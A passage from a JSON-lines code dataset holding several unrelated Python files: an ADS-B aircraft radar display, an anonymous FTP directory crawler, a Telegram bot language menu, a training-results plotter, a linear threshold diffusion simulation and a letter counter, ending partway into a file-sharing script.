Bildschirm\ncenterposx = (screen_width - Menuebreite) / 2 + 0\ncenterposy = screen_height / 2 + 0\ncenterpos = (int(centerposx), int(centerposy))\n\n# Farben definieren\nwhite = (255, 255, 255)\ngray = (128, 128 ,128)\ndarkgray = (40, 40, 40)\nblack = (0, 0, 0)\nred = (255, 0, 0)\ngreen = (0, 128, 0) \n\n# Maus ausblenden\nmauszeit = 10\nlast_mouse_movement = time.time()\npygame.mouse.set_visible(True)\n\n# Fenster erstellen und Fenstertitel vergeben\nif Vollbild:\n\tscreen = pygame.display.set_mode(screen , pygame.FULLSCREEN)\nelse:\n\tscreen = pygame.display.set_mode(screen , pygame.RESIZABLE)\npygame.display.set_caption('ADS-B Empfänger Version 1')\n\n# Schriftarten definieren\nfont = pygame.font.Font(None, 27)\nfontS = pygame.font.Font(None, 20)\nIconfont = pygame.font.Font('/home/adsbpi/ADS-B_Empfaenger/fa-solid-900.ttf', 40)\n\n# Zoom-Button Eigenschaften\nzoomI_btn_width = Menuebreite\nzoomO_btn_width = zoomI_btn_width\nzoomI_btn_height = 70\nzoomO_btn_height = zoomI_btn_height\nzoomI_btn_x = screen_width - zoomI_btn_width\nzoomO_btn_x = screen_width - zoomO_btn_width\nzoomI_btn_y = screen_height - zoomI_btn_height\nzoomO_btn_y = screen_height - zoomO_btn_height - zoomI_btn_height - 5\n\n# Info-Button Eigenschaften\ninfo_btn_width = Menuebreite\ninfo_btn_height = zoomI_btn_height\ninfo_btn_x = screen_width - info_btn_width\ninfo_btn_y = zoomO_btn_y - info_btn_height - 5\n\n# Hide-Button Eigenschaften\nhide_btn_width = Menuebreite\nhide_btn_height = zoomI_btn_height\nhide_btn_x = screen_width - hide_btn_width\nhide_btn_y = info_btn_y - hide_btn_height - 5\n\n\n###--FUNKTIONEN--------------------\n\n# GPS initialisieren und Starten des Threads\ngps = Serial('/dev/ttyS0', 9600)\n\ndef read_gps_data():\n\tglobal lat\n\tglobal lon\n\tglobal alt\n\tglobal gps_signal\n\tglobal gps_thread_running\n\tglobal sats\n\tglobal speed\n\tglobal course\n\twhile gps_thread_running:\t\n\t\tline = gps.readline().decode('utf-8')\n\t\tif line.startswith('$GPGGA'):\n\t\t\tdata = line.split(',')\n\t\t\tif data[2]:\n\t\t\t\tgps_signal = True\n\t\t\t\tlat = float(data[2][:2]) + float(data[2][2:]) / 60\n\t\t\t\tlon = float(data[4][:3]) + float(data[4][3:]) / 60\n\t\t\telse:\n\t\t\t\tgps_signal = False\n\t\t\tif data[7]:\n\t\t\t\tsats = int(data[7])\n\t\t\telse:\n\t\t\t\tsats = 99\n\t\t\tif data[9]:\n\t\t\t\talt = int(float(data[9]))\n\t\tif line.startswith('$GPVTG'):\n\t\t\tdata = line.split(',')\n\t\t\tif data[5]:\n\t\t\t\tspeed = float(data[5])\n\t\t\tif data[1]:\n\t\t\t\tcourse = float(data[1])\n\t\ttime.sleep(0.1)\n\ngps_thread = threading.Thread(target=read_gps_data)\ngps_thread.start()\n\n# Abstandsbestimmungsfunktion anhand der Haversine Formel\ndef Abstand(lat, lon, planelat, planelon):\n\tR = 6371\t# Erdradius in Kilometern\n\tphi1 = math.radians(lat)\n\tphi2 = math.radians(planelat)\n\td_phi = math.radians(planelat - lat)\n\td_lambda = math.radians(planelon - lon)\n\ta = math.sin(d_phi / 2)**2 + math.cos(phi1) * math.cos(phi2) * math.sin(d_lambda / 2)**2\n\tc = 2* math.atan2(math.sqrt(a), math.sqrt(1-a))\n\td = R * c\n\treturn d\n\n# Winkelbestimmung \ndef Winkel(lat, lon, planelat, planelon):\n\tphi1 = math.radians(lat)\n\tphi2 = math.radians(planelat)\n\td_lambda = math.radians(planelon - lon)\n\tx = math.cos(phi2) * math.sin(d_lambda)\n\ty = math.cos(phi1) * math.sin(phi2) - math.sin(phi1) * math.cos(phi2) * math.cos(d_lambda)\n\ttheta = math.atan2(x,y)\n\talpha = math.degrees(theta)\n\treturn alpha\n\n# Pixelkoordinaten bestimmen\ndef getPixelx(planedist, planeangl):\n\tglobal overedge\n\tangl = planeangl - maprotation\n\tdist = planedist / scale\n\tx = int(round(math.sin(math.radians(angl)) * dist))\n\tif x > ((screen_width - Menuebreite) / 2 - Randbreite - 10):\n\t\toveredge = True\n\t\tx = ((screen_width - Menuebreite) / 2 - Randbreite - 10)\n\tif x < ((screen_width - Menuebreite) / -2 + Randbreite):\n\t\toveredge = True\n\t\tx = ((screen_width - Menuebreite) / -2 + Randbreite)\n\treturn x\n\ndef getPixely(planedist, planeangl):\n\tglobal overedge\n\tangl = planeangl - maprotation\n\tdist = planedist / scale\n\ty = int(round(math.cos(math.radians(angl)) * dist))\n\tif y > (screen_height / 2 - Randbreite):\n\t\toveredge = True\n\t\ty = (screen_height / 2 - Randbreite)\n\tif y < (screen_height / -2 + Randbreite):\n\t\toveredge = True\n\t\ty = (screen_height / -2 + Randbreite)\n\treturn y\n\n# Flugzeugsymbol zeichnen\ndef drawPlane(coords, color, dir, size, type):\n\tif type == 0:\n\t\tsymb = chr(0xE22D) # Flugzeug normal\n\telif type == 1:\n\t\tsymb = chr(0xE518) # Kampfjet\n\telif type == 2:\n\t\tsymb = chr(0xF533) # Helikopter\n\telif type == 3:\n\t\tsymb = chr(0xF188) # Bug\n\telif type == 4:\n\t\tsymb = chr(0xF535) # unflyable\n\telif type == 5:\n\t\tsymb = chr(0xF6E2) # Boo\n\telif type == 6:\n\t\tsymb = chr(0xF67B) # FSM\n\tPlanefont = pygame.font.Font('/home/adsbpi/ADS-B_Empfaenger/fa-solid-900.ttf', size)\n\tPlanetext = Planefont.render(symb , True, color)\n\tPlanetext = pygame.transform.rotate(Planetext, -dir + maprotation)\n\tPlanetext_rect = Planetext.get_rect()\n\tPlanetext_rect.center = coords\n\tscreen.blit(Planetext, Planetext_rect)\n\treturn\n\n# Kompass berechnen\ndef calcKompass():\n\tmaxRad = centerposy - 10\n\tTeiler = [200, 150, 100, 75, 50, 40, 30, 20, 10, 7.5, 5, 3, 2, 1, 0.5, 0.2, 0.1]\n\tglobal Radiuskm\n\tglobal Radiuspx\n\tmaxGef = False\n\tfor wert in Teiler:\n\t\tif (wert/scale) < maxRad and maxGef == False:\n\t\t\tRadiuskm = wert\n\t\t\tRadiuspx = int(Radiuskm / scale)\n\t\t\tmaxGef = True\n\treturn\n\n# Kompass zeichen\ndef drawKompass():\n\tpygame.draw.circle(screen, black, centerpos, Radiuspx , 1)\n\ttext = str(Radiuskm) + \" km\"\n\ttext_width, text_height = font.size(text)\n\tscreen.blit(font.render(text, True, black), (centerposx - (text_width / 2), int(centerposy + Radiuspx - 25)))\n\treturn\n\n# Infos an Symbol anzeigen\ndef drawInfo(planepos,info1,info2,info3,info4):\n\tscreen.blit(fontS.render(str(info1), True, black), tuple(map(sum, zip(planepos,(-20,20)))))\n\tif info2:\n\t\tscreen.blit(fontS.render(str(info2), True, black), tuple(map(sum, zip(planepos,(-20,33)))))\n\t\tscreen.blit(fontS.render(str(info3), True, black), tuple(map(sum, zip(planepos,(-20,46)))))\n\t\tscreen.blit(fontS.render(str(info4), True, black), tuple(map(sum, zip(planepos,(-20,59)))))\n\treturn\n\npygame.display.update()\ntouchsize = 40\nOwnPlanetype = 0\n\nrunning = True\nwhile running:\n\t# Events überprüfen\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tquit()\n\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\tlast_mouse_movement = time.time()\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\trunning = False\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\tif zoomI_btn_x <= mouse_pos[0] <= zoomI_btn_x + zoomI_btn_width and zoomI_btn_y <= mouse_pos[1] <= zoomI_btn_y + zoomI_btn_height:\n\t\t\t\tscale *= 0.9\n\t\t\t\tif scale < 0.0005:\n\t\t\t\t\tscale = 0.0005\n\t\t\tif zoomO_btn_x <= mouse_pos[0] <= zoomO_btn_x + zoomO_btn_width and zoomO_btn_y <= mouse_pos[1] <= zoomO_btn_y + zoomO_btn_height:\n\t\t\t\tscale *= 1.1\n\t\t\t\tif scale > 2:\n\t\t\t\t\tscale = 2\n\t\t\tif info_btn_x <= mouse_pos[0] <= info_btn_x + info_btn_width and info_btn_y <= mouse_pos[1] <= info_btn_y + info_btn_height:\n\t\t\t\tif Info:\n\t\t\t\t\tInfo = False\n\t\t\t\telse:\n\t\t\t\t\tInfo = True\n\t\t\tif hide_btn_x <= mouse_pos[0] <= hide_btn_x + hide_btn_width and hide_btn_y <= mouse_pos[1] <= hide_btn_y + hide_btn_height:\n\t\t\t\tif Hide:\n\t\t\t\t\tHide = False\n\t\t\t\telse:\n\t\t\t\t\tHide = True\n\t\t\tif centerposx - touchsize <= mouse_pos[0] <= centerposx + touchsize and centerposy - touchsize <= mouse_pos[1] <= centerposy + touchsize:\n\t\t\t\tOwnPlanetype += 1\n\t\t\t\tif OwnPlanetype > 6:\n\t\t\t\t\tOwnPlanetype = 0\n\n\t# Maus ausblenden\n\tif time.time() - last_mouse_movement > mauszeit:\n\t\tpygame.mouse.set_visible(False)\n\telse:\n\t\tpygame.mouse.set_visible(True)\n\n\t# Hintergrund einfärben\n\tscreen.fill(white)\n\tpygame.draw.line(screen, gray, [Menuekante - 4, 0], [Menuekante - 4, screen_height], 2)\n\n\t# Kompass zeichen\n\tif scale != scale_alt:\n\t\tcalcKompass()\n\tdrawKompass()\n\tscale_alt = scale\n\n\t# Variable anzeigen\n\tlattext = font.render(str(round(lat, 5)), True, black)\n\tlontext = font.render(str(round(lon, 5)), True, black)\n\tcoursetext = font.render((str(int(course))+ \" °\"), True, black)\n\tspeedtext = font.render((str(int(speed))+ \" kt\"), True, black)\n\talttext = font.render((str(alt)+ \" m\"), True, black)\n\tscreen.blit(lattext, (Menuekante, 30))\n\tscreen.blit(lontext, (Menuekante, 50))\n\tscreen.blit(coursetext, (Menuekante, 80))\n\tscreen.blit(speedtext, (Menuekante, 100))\n\tscreen.blit(alttext, (Menuekante, 120))\n\n\t# GPS-Status anzeigen\n\tif gps_signal:\n\t\tscreen.blit(font.render(\"GPS\", True, green), (Menuekante, 6))\n\telse:\n\t\tscreen.blit(font.render(\"Kein GPS\", True, red), (Menuekante, 6))\n\n\t#Zoom-In-Button Schaltfläche\n\tpygame.draw.rect(screen, gray, (zoomI_btn_x, zoomI_btn_y, zoomI_btn_width, zoomI_btn_height))\n\tzoomItext = Iconfont.render(chr(0xF00E), True, white)\n\tzoomItext_rect = zoomItext.get_rect(center=(zoomI_btn_x + zoomI_btn_width // 2, zoomI_btn_y + zoomI_btn_height // 2))\n\tscreen.blit(zoomItext, zoomItext_rect)\n\n\t#Zoom-Out-Button Schaltfläche\n\tpygame.draw.rect(screen, gray, (zoomO_btn_x, zoomO_btn_y, zoomO_btn_width, zoomO_btn_height))\n\tzoomOtext = Iconfont.render(chr(0xF010), True, white)\n\tzoomOtext_rect = zoomOtext.get_rect(center=(zoomO_btn_x + zoomO_btn_width // 2, zoomO_btn_y + zoomO_btn_height // 2))\n\tscreen.blit(zoomOtext, zoomOtext_rect)\n\n\t#Info-Button Schaltfläche\n\tif Info:\n\t\tinfocolor = darkgray\n\telse:\n\t\tinfocolor = gray\n\tpygame.draw.rect(screen, infocolor, (info_btn_x, info_btn_y, info_btn_width, info_btn_height))\n\tinfotext = Iconfont.render(chr(0xF05A), True, white)\n\tinfotext_rect = infotext.get_rect(center=(info_btn_x + info_btn_width // 2, info_btn_y + info_btn_height // 2))\n\tscreen.blit(infotext, infotext_rect)\n\n\t#Hide-Button Schaltfläche\n\tif Hide:\n\t\thidecolor = darkgray\n\t\thidechr = chr(0xF070)\n\telse:\n\t\thidecolor = gray\n\t\thidechr = chr(0xF06E)\n\tpygame.draw.rect(screen, hidecolor, (hide_btn_x, hide_btn_y, hide_btn_width, hide_btn_height))\n\thidetext = Iconfont.render(hidechr, True, white)\n\thidetext_rect = hidetext.get_rect(center=(hide_btn_x + hide_btn_width // 2, hide_btn_y + hide_btn_height // 2))\n\tscreen.blit(hidetext, hidetext_rect)\n\n\t# Eigene Position darstellen\n\tdrawPlane(centerpos, green, course ,40, OwnPlanetype)\n\n\t# Dump1090 auslesen\n\tresponse = urllib.request.urlopen(url)\n\tdata = json.loads(response.read())\n\tplanedetec_raw = 0\n\tplanedetec_loc = 0\n\tfor aircraft in data['aircraft']:\n\t\tif aircraft.get('seen') < deadtime2:\n\t\t\tplanedetec_raw += 1\n\t\t\tif 'lat' in aircraft:\n\t\t\t\tplanedetec_loc += 1\n\t\t\t\toveredge = False\n\t\t\t\tisGround = False\n\t\t\t\tplanelat = aircraft.get('lat')\n\t\t\t\tplanelon = aircraft.get('lon')\n\t\t\t\tplanealt = aircraft.get('altitude')\n\t\t\t\tif isinstance(planealt,(int)) == False:\n\t\t\t\t\tif planealt == \"ground\":\n\t\t\t\t\t\tisGround = True\n\t\t\t\t\tplanealt = 0\n\t\t\t\tplanedist = Abstand(lat, lon, planelat, planelon)\n\t\t\t\tplaneangl = Winkel(lat, lon, planelat, planelon)\n\t\t\t\tplanepixelpos = (int(centerposx + getPixelx(planedist, planeangl)), int(centerposy - getPixely(planedist, planeangl)))\n\t\t\t\tif aircraft.get('seen_pos') > deadtime1:\n\t\t\t\t\tplanecolor = gray\n\t\t\t\telse:\n\t\t\t\t\tplanecolor = black\n\t\t\t\tif overedge or (Hide and planealt > (alt*3.28 + deltaH )):\n\t\t\t\t\tplanesize = 20\n\t\t\t\telse:\n\t\t\t\t\tplanesize = 30\n\t\t\t\t\tinfo2 = \"\"\n\t\t\t\t\tinfo3 = \"\"\n\t\t\t\t\tinfo4 = \"\"\n\t\t\t\t\tif 'flight' in aircraft and Radio:\n\t\t\t\t\t\tinfo1 = aircraft.get('flight')\n\t\t\t\t\telse:\n\t\t\t\t\t\tinfo1 = aircraft.get('hex')\n\t\t\t\t\tif Info:\n\t\t\t\t\t\tif isGround:\n\t\t\t\t\t\t\tinfo2 = \"GROUND\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinfo2 = str(planealt) + \" ft\"\n\t\t\t\t\t\tinfo3 = str(aircraft.get('track')) + \" °\"\n\t\t\t\t\t\tinfo4 = str(aircraft.get('speed')) + \" kt\"\n\t\t\t\t\tdrawInfo(planepixelpos, info1, info2, info3, info4)\n\t\t\t\tdrawPlane((planepixelpos), planecolor, aircraft.get('track',0), planesize, 0)\n\n\t# Debug-Anzeige in Menueleiste\n\tdebugtext = fontS.render((\"R\" + str(planedetec_raw) + \" / L\" + str(planedetec_loc) + \" / S\" + str(sats)), True, black)\n\tscreen.blit(debugtext, (Menuekante, hide_btn_y-15))\n\n\tpygame.display.update()\n\tpygame.time.Clock().tick(60)\n\n# Abbruchroutine\np.terminate()\ngps_thread_running = False\ngps_thread.join()\npygame.quit()\nsys.exit()\n","repo_name":"Waages/ADS-B_Empfaenger","sub_path":"adsb_receiver.py","file_name":"adsb_receiver.py","file_ext":"py","file_size_in_byte":13620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24075657344","text":"#! /usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport json\nimport ftplib\nimport random\nimport logging\nimport datetime\n\n# Object to access FTP site\nclass FTPConnection(object):\n def __init__(self, host, parser=None):\n self.host = host\n self.failed_attempts = 0\n self.max_attempts = 5\n self.stop_when_connected()\n \n if parser is None:\n # try to guess on first access\n logging.info(\"No parser provided; will guess on first attempt.\")\n self._listfn = None\n elif callable(parser):\n # supply a custom listing parser\n logging.info(\"Supplied a custom dir listing parser.\")\n self._listfn = parser\n elif parser == 'mlsd':\n logging.info(\"Set parser to MLSD.\")\n self._listfn = self._list_mlsd\n elif parser == 'unix':\n logging.info(\"Set parser to UNIX.\")\n self._listfn = self._list_unix\n elif parser == 'windows':\n logging.info(\"Set parser to WINDOWS.\")\n self._listfn = self._list_windows\n \n def _connect(self):\n # attempt an anonymous FTP connection\n logging.info(\"CONNECT %s ATTEMPT\", self.host)\n self.ftp = ftplib.FTP(self.host, timeout=60)\n self.ftp.login()\n logging.info(\"CONNECT %s SUCCESS\", self.host)\n \n def stop_when_connected(self):\n # continually tries to reconnect ad infinitum\n try:\n self._connect()\n except ftplib.all_errors:\n logging.warning(\"CONNECT %s FAILED; trying again...\", self.host)\n time.sleep(5 * random.uniform(0.5, 1.5))\n self.stop_when_connected()\n \n def _list(self, path):\n # public fn to get a path listing\n # guesses the format if it's not explicitly set\n try:\n return self._listfn(path)\n except AttributeError:\n # self._listfn is not defined;\n # try to guess it\n self._listfn = self._guess_parser(path)\n return self._listfn(path)\n \n def _guess_parser(self, path):\n # also check out this library: http://cr.yp.to/ftpparse.html\n logging.info(\"Guessing FTP listing parser for %s...\", self.host)\n try:\n lines = []\n self.ftp.retrlines('MLSD %s' % path, lines.append)\n logging.info(\"Guessing parser: MLSD success\")\n return self._list_mlsd\n except ftplib.all_errors:\n logging.info(\"Guessing parser: MLSD fail\")\n \n # not MLSD, so:\n # get a listing and check a few properties\n dir_in_3rd = lambda line: \"
\" in line.split()[2]\n numeric_first_letter = lambda line: line[0] >= '0' and line[0] <= '9'\n unix_first_letter = lambda line: line[0] in 'd-lpsbc'\n \n lines = []\n self.ftp.retrlines('LIST %s' % path, lines.append)\n \n # check for windows\n if (any(map(dir_in_3rd, lines)) and\n all(map(numeric_first_letter, lines))):\n logging.info(\"Guessing parser: WINDOWS\")\n return self._list_windows\n \n # check for unix\n if all(map(unix_first_letter, lines)):\n logging.info(\"Guessing parser: UNIX\")\n return self._list_unix\n \n logging.error('\\n'.join(lines))\n raise RuntimeError(\"Failed to guess parser.\")\n \n # these functions interact with the FTP with no error checking\n # they just take a path and try to return properly-formatted data\n def _list_mlsd(self, path):\n # copy of MLSD impl from Python 3.3 ftplib package that returns\n # listing data in a machine-readable format\n cmd = 'MLSD %s' % path\n lines = []\n self.ftp.retrlines(cmd, lines.append)\n results = []\n for line in lines:\n facts_found, _, name = line.rstrip('\\r\\n').partition(' ')\n entry = {}\n for fact in facts_found[:-1].split(\";\"):\n key, _, value = fact.partition(\"=\")\n entry[key.lower()] = value\n results.append((name, entry))\n return results\n \n def _list_windows(self, path):\n lines = []\n self.ftp.dir(path, lines.append)\n results = []\n for line in lines:\n fields = line.split()\n name = ' '.join(fields[3:])\n size = -1\n if fields[2].strip() == '':\n type_ = 'dir'\n else:\n type_ = 'file'\n size = int(fields[2])\n results.append((name, {'type': type_, 'size': size}))\n return results\n \n def _list_unix(self, path):\n lines = []\n self.ftp.dir(path, lines.append)\n results = []\n for line in lines:\n fields = line.split()\n name = ' '.join(fields[8:])\n size = -1\n if line[0] == 'd':\n type_ = 'dir'\n elif line[0] == '-':\n type_ = 'file'\n size = int(fields[4])\n elif line[0] == 'l':\n continue\n else:\n raise ValueError(\"Don't know what kind of file I have: %s\" % line.strip())\n results.append((name, {'type': type_, 'size': size}))\n return results\n \n # this function actually handles the logic of pulling data\n # it tries a max of max_attempts times\n def process_path(self, path):\n while self.failed_attempts < self.max_attempts:\n try:\n results = self._list(path)\n logging.info(\"LIST SUCCESS %s\" % path)\n self.failed_attempts = 0\n return results\n except ftplib.all_errors:\n self.failed_attempts += 1\n self.ftp.close()\n logging.warning(\"LIST FAILED %s; Failed %i times out of %i; reconnecting...\", path, self.failed_attempts, self.max_attempts)\n time.sleep(2 * random.uniform(0.5, 1.5))\n self.stop_when_connected()\n \n # if I get here, I never succeeded in getting the data\n logging.warning(\"LIST ABANDONED %s\", path)\n self.failed_attempts = 0\n return False\n \n\n# Recursive building of FTP tree\ndef crawltree(ftp, tree):\n path = os.path.join(tree['ancestors'], tree['name'])\n results = ftp.process_path(path)\n if results == False:\n return tree\n \n for result in results:\n name = result[0]\n type_ = result[1]['type']\n if type_ == 'file':\n size = int(result[1]['size'])\n tree['children'][name] = {'name': name, 'ancestors': path, 'size': size, 'children': {}}\n logging.info(\"APPENDED file %s\", os.path.join(path, name))\n elif type_ == 'dir':\n tree['children'][name] = crawltree(ftp, {'name': name, 'ancestors': path, 'size': -1, 'children': {}})\n logging.info(\"PROCESSED dir %s\", os.path.join(path, name))\n \n return tree\n\n# Traverse tree and compute sizes for internal nodes\ndef computesize(tree):\n if tree['size'] > -1:\n return tree['size']\n \n size = 0\n for child in tree['children'].itervalues():\n size += computesize(child)\n \n tree['size'] = size\n return size\n\n\nif __name__ == '__main__':\n import argparse\n \n parser = argparse.ArgumentParser()\n parser.add_argument('config')\n parser.add_argument('--loglevel', default='INFO')\n args = parser.parse_args()\n \n with open(args.config, 'r') as ip:\n config = json.loads(ip.read())\n \n logging.basicConfig(filename=config['id'] + '.crawl.log',\n filemode='w',\n level=args.loglevel,\n format=\"%(levelname)s|%(asctime)s|%(message)s\")\n \n ftp = FTPConnection(config['host'], config['ftp_list_method']) \n tree = crawltree(ftp, {'name': '', 'ancestors': config['root_path'].strip('/'), 'size': -1, 'children': {}})\n tree['date'] = str(datetime.date.today())\n weight = computesize(tree)\n logging.info(\"TOTAL WEIGHT %i bytes\", weight)\n \n # dump json object\n with open(config['tree_file'], 'w') as op:\n json.dump(tree, op, encoding='ISO-8859-1')\n","repo_name":"laserson/ftptree","sub_path":"crawltree.py","file_name":"crawltree.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"20523028142","text":"from NekoGram import Neko, Menu, NekoRouter\nfrom . import util\nfrom aiogram import types\n\nROUTER: NekoRouter = NekoRouter(name='languages')\n\n\n@ROUTER.formatter()\nasync def widget_languages(data: Menu, _: types.User, __: Neko):\n markup: types.InlineKeyboardMarkup = types.InlineKeyboardMarkup()\n for lang in util.languages:\n text = util.replacements.get(lang, lang).upper()\n text = f'{chr(ord(text[0]) + 127397) + chr(ord(text[1]) + 127397)}{lang.upper()}'\n markup.add(types.InlineKeyboardButton(text=text, callback_data=f'widget_languages_set#{lang}'))\n await data.build(markup=markup)\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"NekoGram/widgets/languages/formatters.py","file_name":"formatters.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8740190615","text":"\"\"\"\nRead the learning results and make some plots.\n\"\"\"\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom settings.initial_settings import *\n\n\ndef main():\n results_dir = os.path.join('./' + PROJECT + '/results/')\n results_file = results_dir + TRIAL + '.pkl'\n print(results_file)\n\n file_dir = results_dir + TRIAL + '/'\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n\n file = open(results_file, 'rb')\n steps_history = pickle.load(file)\n success_history = pickle.load(file)\n fail_history = pickle.load(file)\n draw_history = pickle.load(file)\n alive_red_history = pickle.load(file)\n alive_blue_history = pickle.load(file)\n red_force_history = pickle.load(file)\n blue_force_history = pickle.load(file)\n episode_length_history = pickle.load((file)) # Available after fwd_4\n\n file.close()\n\n \"\"\"\n print(steps_history)\n print(success_history)\n print(fail_history)\n print(draw_history)\n print(alive_red_history)\n print(alive_blue_history)\n print(red_force_history)\n print(blue_force_history)\n \"\"\"\n\n plt.plot(steps_history, success_history, label='success', color='r')\n plt.plot(steps_history, fail_history, label='fail', color='b')\n plt.plot(steps_history, draw_history, label='draw', color='g')\n plt.title(f'Number of success, fail, and draw during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('success, fail, draw episodes number')\n plt.ylim(0, 100)\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'success_ratio.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, alive_red_history, label='survived_red', color='r')\n plt.plot(steps_history, alive_blue_history, label='survived_blue', color='b')\n plt.title(f'Number of survived agents during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean survived agents number')\n plt.ylim(0, np.max([NUM_RED_MAX, NUM_BLUE_MAX]))\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'survived_agents.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, red_force_history, label='red_force', color='r')\n plt.plot(steps_history, blue_force_history, label='blue_force', color='b')\n plt.title(f'Survived total force of agents during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean total force of survived agents')\n plt.ylim(0, np.max([RED_TOTAL_FORCE, BLUE_TOTAL_FORCE])/2)\n plt.grid()\n plt.legend()\n # plt.show()\n file_name = file_dir + 'survived_force.png'\n plt.savefig(file_name)\n plt.close()\n\n plt.plot(steps_history, episode_length_history)\n plt.title(f'Episode length during the training: {TRIAL}')\n plt.xlabel('steps')\n plt.ylabel('mean episode_length')\n plt.ylim(0, MAX_STEPS*1.1)\n plt.grid()\n file_name = file_dir + 'episode_length.png'\n plt.savefig(file_name)\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DreamMaker-Ai/MultiAgent_BattleField","sub_path":"A_SimpleEnvironment/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5072464442","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nimport copy\n\ndef main():\n G = nx.fast_gnp_random_graph(100, .2, 1, directed=True)\n for (u,v,w) in G.edges(data=True):\n w['weight'] = random.randint(0,1)\n for v in G.nodes():\n var = G.in_degree(v,weight='weight')\n #print(var) #var contains the sum of incoming edge weights\n for u, v, data in G.in_edges(v, data=True):\n #print (u,v,data)\n if(var!=0):\n G[u][v]['weight']=G[u][v]['weight']/var #normalizing weights for incoming edges\n # print (u,v,data) #to check the nomalize weights\n #print(\".................................\")\n # nx.set_node_attributes(G, 'Active', 0) #'Active' attribute is for diffusion or activating a node\n # G.node[1]['Active'] = 1 #Example: node 1 is set to active\n # G.add_edge(1, 2, weight=0.3)#Example: Add edge with weight\n # print(/G.node)\n # print(G.edge)\n nx.draw_networkx(G, pos=None, arrows=True, with_labels=True)\n plt.draw()\n plt.savefig(\"examples.png\")\n # the source nodes that we can activate\n arr = [1, 3, 4, 7, 8, 10, 14, 16, 20, 25, 41, 49]\n # simulation for 1000 rounds\n result = simulation(G, arr, simulationRound=1000);\n print(result);\n\ndef simulation(G, seeds, simulationRound):\n avg = 0;\n for k in range(simulationRound):\n layers = linear_threshold(G,seeds);\n # print(layers)\n # print(len(layers)) #the steps\\\n count = 0\n for i in layers:\n count += len(i)\n # print(len(i),end = ' ') #the size of avtivate node in each diffusion round\n # print(\"\"); #change line\n # print(count) #the total number of activate nodes after all diffusion process\n avg += count;\n k += 1;\n return avg/simulationRound;\n\ndef linear_threshold(G, seeds):\n\n # make sure the seeds are in the graph\n for s in seeds:\n if s not in G.nodes():\n raise Exception(\"seed\", s, \"is not in graph\")\n\n # copy the graph\n DG = copy.deepcopy(G)\n\n # init thresholds\n for n in DG.nodes():\n DG.node[n]['threshold'] = random.randint(0,1)\n\n # perform diffusion\n A = copy.deepcopy(seeds)\n # perform diffusion until no more nodes can be activated\n return _diffuse_all(DG, A)\n\ndef _diffuse_all(G, A):\n layer_i_nodes = [ ]\n layer_i_nodes.append([i for i in A])\n while True:\n len_old = len(A)\n A, activated_nodes_of_this_round = _diffuse_one_round(G, A)\n layer_i_nodes.append(activated_nodes_of_this_round)\n if len(A) == len_old:\n break\n return layer_i_nodes\n\n# activate neighbors according to threshold and in-degree weights\ndef _diffuse_one_round(G, A):\n activated_nodes_of_this_round = set()\n for s in A:\n nbs = G.successors(s)\n for nb in nbs:\n if nb in A:\n continue\n active_nb = list(set(G.predecessors(nb)).intersection(set(A)))\n if _influence_sum(G, active_nb, nb) >= G.node[nb]['threshold']:\n activated_nodes_of_this_round.add(nb)\n A.extend(list(activated_nodes_of_this_round))\n return A, list(activated_nodes_of_this_round)\n\n# Calculate the in-degree sum of weights\ndef _influence_sum(G, froms, to):\n influence_sum = 0.0\n for f in froms:\n influence_sum += G[f][to]['weight']\n return influence_sum\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mparvezrashid/linear-threshold-model","sub_path":"linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2626963929","text":"def conta_letras(frase: str, contar=\"vogais\" ):\n aux = frase.split()\n frase = \"\"\n for c in range(len(aux)):\n frase += aux[c]\n resultado = vogais_consoantes(frase)\n if contar == \"vogais\":\n return resultado[0]\n else:\n return resultado[1]\n\n\ndef vogais_consoantes(frase: str):\n vogais = 0\n consoantes = 0\n for c in range(len(frase)):\n if frase[c].isalpha():\n if frase[c].lower() in ['a', 'e','i', 'o', 'u']:\n vogais += 1\n else:\n consoantes += 1\n resultado = [vogais, consoantes]\n return resultado\n","repo_name":"DanielZanad/Exercicios-de-Ciencia-da-computacao","sub_path":"conta_char.py","file_name":"conta_char.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73725524969","text":"#! /usr/bin/python3\n\n\n\n#--------------------------------------------------------------------------------------------------\n#DEPENDENCIES #(sudo apt install python3)\n #(pip3 install os)\n #(pip3 install socket)\n #(sudo apt install qrencode)\n#--------------------------------------------------------------------------------------------------- \n \n \n \n \nimport os #importing the os library (pip3 install os )\nimport socket #importing the socet module which helps us in getting our ip address(pip3 install socket) \n\nprint(\"Using this program you can browse all your system files 